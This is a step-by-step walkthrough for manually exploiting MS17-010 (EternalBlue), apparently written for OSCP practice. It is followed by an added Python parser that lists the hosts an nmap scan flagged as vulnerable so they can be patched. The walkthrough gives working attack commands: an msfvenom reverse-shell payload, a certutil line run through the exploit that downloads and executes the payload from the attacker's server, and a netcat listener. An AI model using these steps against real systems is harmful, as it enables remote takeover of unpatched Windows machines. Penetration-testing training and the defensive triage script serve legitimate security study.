Manual exploit for MS17-010 (EternalBlue)
First check whether the target is actually vulnerable:
nmap --script smb-vuln-ms17-010.nse <target-ip>
pip3 install impacket
• Download 42315.py and mysmb.py
• Make sure 42315.py and mysmb.py are in the same folder
• Create a reverse shell payload:
• Use MSFvenom to create a reverse shell payload (allowed on the OSCP as long as you’re not using meterpreter).
msfvenom -p windows/shell_reverse_tcp -f exe LHOST=<IP> LPORT=4444 > w644444.exe
• Or use a different payload (revshells.com)
• Edit lines 36 and 37 to enter valid credentials:
USERNAME = ""
PASSWORD = ""
If no credentials are known, try the 'GUEST' account.
Check whether GUEST access is allowed with: enum4linux -a <target_ip>
• Edit line 923:
service_exec(conn, r'cmd /c certutil -urlcache -split -f http://<Your IP>/w644444.exe w644444.exe & w644444.exe')
Add your IP and change the payload name if needed.
• Setup Python server on port 80:
python3 -m http.server 80
• Now that all three tasks are done, set up a listener on your attack machine:
nc -nlvp 4444
• Then run the exploit:
python 42315.py <target_ip>
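To triage the nmap check at the top of this page across many hosts, here is an added parser (not part of the original write-up) that pulls the per-host State reported by smb-vuln-ms17-010 so the hosts flagged VULNERABLE can be patched or isolated first; the embedded scan text is a constructed sample in nmap's normal-output layout.

```python
import re
# Constructed sample of nmap normal (-oN) output: first host flagged VULNERABLE,
# second host where the script could not complete and printed no State line.
SAMPLE_SCAN = """\
Nmap scan report for 10.0.0.5
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|_    Risk factor: HIGH

Nmap scan report for 10.0.0.6
Host script results:
|_smb-vuln-ms17-010: Could not negotiate a connection
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SCRIPT_RE = re.compile(r"^\|_?\s*smb-vuln-ms17-010:")
STATE_RE = re.compile(r"^\|\s+State:\s+(.+?)\s*$")

def parse_ms17_010(scan_text):
    """Map each host with an smb-vuln-ms17-010 result to the reported State,
    or 'UNKNOWN' when the script ran but printed no State line."""
    results = {}
    host, in_script = None, False
    for line in scan_text.splitlines():
        m = HOST_RE.match(line)
        if m:                      # new host block resets script context
            host, in_script = m.group(1), False
            continue
        if host is None:
            continue
        if SCRIPT_RE.match(line):
            results.setdefault(host, "UNKNOWN")
            in_script = not line.startswith("|_")   # "|_" = one-line result
            continue
        if in_script:
            m = STATE_RE.match(line)
            if m:
                results[host] = m.group(1)
            if line.startswith("|_"):               # last line of the block
                in_script = False
    return results

def vulnerable_hosts(scan_text):
    """Hosts the scan flagged VULNERABLE: patch MS17-010 / disable SMBv1 first."""
    return sorted(h for h, s in parse_ms17_010(scan_text).items() if s == "VULNERABLE")
```

Feed it the saved normal output of the nmap scan (for example via `-oN`) instead of the constructed sample to get the real list.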